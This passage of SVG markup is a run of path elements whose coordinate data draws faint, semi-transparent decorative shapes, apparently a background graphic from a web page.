d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          